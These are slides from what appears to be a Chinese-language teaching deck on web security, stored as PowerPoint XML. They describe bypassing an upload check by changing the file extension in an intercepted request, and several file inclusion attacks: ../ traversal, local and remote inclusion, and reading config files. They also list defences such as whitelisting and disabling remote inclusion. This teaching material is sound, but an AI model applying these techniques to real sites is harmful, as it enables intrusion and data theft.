            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> image/png </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>因此可以考虑抓包改后缀名绕过来利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>该漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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3" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232977" y="3290442"/>
            <a:ext cx="7649845" cy="1106805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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文件包含漏洞</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4497707" y="2357310"/>
            <a:ext cx="3088005" cy="617855"/>
            <a:chOff x="6683" y="5071"/>
            <a:chExt cx="4863" cy="973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683" y="5071"/>
              <a:ext cx="4863" cy="973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7555" y="5098"/>
              <a:ext cx="3119" cy="919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <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rPr>
                <a:t>Part 03</a:t>
              </a:r>
              <a:endPar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12923" y="-1270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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549275" y="986790"/>
            <a:ext cx="4766945" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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1</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、什么是</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文件包含</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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953770" y="1782445"/>
            <a:ext cx="4552315" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，并让服务端执行，有时候由于网站功能需求，会让前端用户选择要包含的文件，而开发人员又没有对要包含的文件进行安全考虑，就导致攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6042660" y="1676400"/>
            <a:ext cx="6149340" cy="3505200"/>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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422910" y="98679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2</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、漏洞产生</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原因</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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991870" y="2096135"/>
            <a:ext cx="4901565" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件包含漏洞产生的原因主要是开发人员没有正确的输入验证和参数过滤，或者在包含文件时使用了不安全的方式。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开发人员没有对用户输入的参数进行正确的过滤和检查，导致攻击者可以在包含文件时控制参数的值，从而访问敏感文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在包含文件时使用绝对路径，即可以是硬编码的也可以是用户输入的。如果是从用户输入的参数构建文件路径，则会导致包含了任意文件，包括系统和应用数据文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5893435" y="2702560"/>
            <a:ext cx="6042660" cy="193357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3</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、漏洞攻击与</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防御</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561975" y="1901190"/>
            <a:ext cx="1544955" cy="837565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6431915" y="1901190"/>
            <a:ext cx="1544955" cy="837565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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防御：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912620" y="1985010"/>
            <a:ext cx="4064000" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目录遍历攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者可以通过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数中使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来绕过目录限制，访问系统文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件包含恶意代码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果服务器允许文件包含，攻击者还可能通过上传一个恶意文件并将其包含执行。例如，攻击者上传一个包含恶意代码的文件，并操控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数来包含这个文件，导致执行服务器上的恶意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>远程文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果服务器允许包含远程文件，攻击者可能尝试通过传递外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来包含一个恶意的远程文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息泄露：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者还可以利用文件包含漏洞读取其他敏感文件，如配置文件、数据库密码文件等，泄露服务器上的敏感数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7676515" y="1901190"/>
            <a:ext cx="4064000" cy="4769485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>白名单机制（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最有效的防止文件包含漏洞的方法是使用白名单，仅允许包含预定义的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径清理与过滤：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> basename() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数来确保只提取文件名，而不是路径，这样可以避免目录遍历攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用绝对路径：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不要允许用户控制文件的路径，最好使用绝对路径来包含文件，这样可以避免攻击者利用相对路径访问服务器上的敏感文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>禁用远程文件包含：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果不需要远程文件包含功能，可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>配置文件中禁用它。确保以下配置项在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> php.ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>错误处理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>始终确保在文件包含失败时不会暴露详细的错误信息，以免泄漏服务器的内部路径结构。应使用通用的错误信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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5" name="文本框 4"/>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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058545" y="1830070"/>
            <a:ext cx="8529955" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这里用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
